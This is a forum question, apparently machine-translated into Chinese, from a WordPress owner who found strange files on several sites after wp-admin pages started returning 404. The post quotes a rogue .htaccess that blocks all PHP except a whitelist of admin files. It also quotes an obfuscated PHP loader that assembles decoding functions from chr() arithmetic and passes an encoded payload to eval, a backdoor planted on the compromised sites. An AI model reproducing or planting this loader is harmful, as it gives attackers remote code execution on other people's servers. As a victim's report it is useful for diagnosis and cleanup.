我有一个奇怪的php文件,出现在cpanel的文件管理器中的不同wordpress网站上

我有一个问题与这里这个未回答的话题中所说的类似:

There is an unwanted .htaccess file with "Order Allow,Deny" in all my wordpress subfolders

这里有一些:

Admin links shows 404 WordPress

这意味着我在Cpanel文件管理器的不同wordpress文件夹中发现了不同的不需要的htaccess文件(或者更确切地说,我不记得放在那里的文件)。我不知道它是否相关,但当我访问不同网站的wp-admin时,我无法从仪表板访问插件界面或媒体,因为我得到了一个404找不到。有些文件写得像“htaccess.ht”或“htaccess.bk”,看起来是这样的:

RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

或者像这样:

<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected|php7|php8|pHP7|PHP7|php58)$"\>
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "^(index.php|credits.php|customize.php|edit-comments.php|edit-tags.php|edit.php|checkbox.php|export.php|input.php|link.php|load-scripts.php|load-styles.php|dropdown.php|menu.php|nav-menus.php|network.php|options-discussion.php|options-general.php|options-permalink.php|options-privacy.php|options-reading.php|options-writing.php|plugins.php|post-new.php|post.php|privacy.php|profile.php|site-health.php|term.php|text.php|themes.php|tools.php|update-core.php|user-edit.php|user-new.php|users.php|wp-links.php|wp-login.php|wp-signup.php)$"\>

Order allow,deny
Allow from all

</FilesMatch>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

这看起来并没有太大的威胁,但它仍然引出了一个问题。。。

更奇怪的是,到处都出现了不同名称的php文件,其中总是有相同的代码:

<?php 
$co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); 

$na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); 

$ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); 

$AmInE = "ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d"; 

$AmineDns = "=UvmLf1PNqJF8Isk5oJJuCJbUnKE6V8MRlbdTH+LGS1rsNXfL7l+n7Z/zCc/0x76Pb1S4Q1gnj2KXGz/67Id57kEDyc1UpM29Srl73G1iNKDVNmu7vb7KPTX1aFGuy1qdMbXq2KT3Mvry4TdSwScm1FI4ybP1C1NMqU4iVsCWrvML+PbemQVOpQ5WlDCgHIEr7ZEbVBmpjAGy7IQXGT8XiUlC2q8XcDgRViOGxnYZuAk7ADk8C+gCMl7PC9uHb3PKh96n88SVENqonNW/EHNrC2Rq4wrfCiJY+UaAYFm0ug+o/MgNITG3hZaGicIMZr7WoQqam/s1YOlD3L5CMdMzq7gaQmvzeW6AMZB2zDB0OM+AY6CnGgqi5C6RwUJSe3WqQmkntsbUehG418D7s3O7MTO4RQkO9O8RKn0UrwQAKXgmSDatIGpPsqaE4CpJi0II1ktawUF8DBUC702QVFn45PoB8VA";/*2e3300cd40ea092e5eeb579abe01e85a*/ 

eval($co($ro($na($AmInE)))); 
exit; 
?>

当我打开Php时,它会给我以下信息

here's the output

目前为止

• 我尝试过使用WP_DEBUG,但没有收到任何与404错误有关的消息。。。
• 我不能添加插件来搜索错误,因为。。。当我试图进入“添加插件”菜单时,我得到了404。
• 我已经尝试过去除不需要的htaccess文件,并通过进入Tools>永久链接>拯救
• 在error_log中,我多次尝试wp_privacy_delete_old_export_files函数,但都无法发送。。
• 我试图更新所有内容并重新安装wordpress的最新版本,但我也遇到了一个错误
• 我已经检查了wp配置文件,plugin-install.php文件。。。但没有发现任何异常。。。最糟糕的是,我所有的插件都能完美工作,我只是。。无法访问任何仪表板,也无法正常工作。。。

我的问题是:我应该担心吗?如果是Mod_rewrite问题,我已经联系了Cpanel的支持人员,所有问题都应该得到解决。但是,如果有人能向我提供任何关于这个问题的信息,那将是非常好的他们!

感谢您抽出时间阅读

**编辑:**非常感谢!我刚刚从备份中建立了一个干净的安装,进行了安全检查,更改了密码,从那以后再也没有看到任何奇怪的事情,所以我相信我的问题已经解决了。会不时检查以确保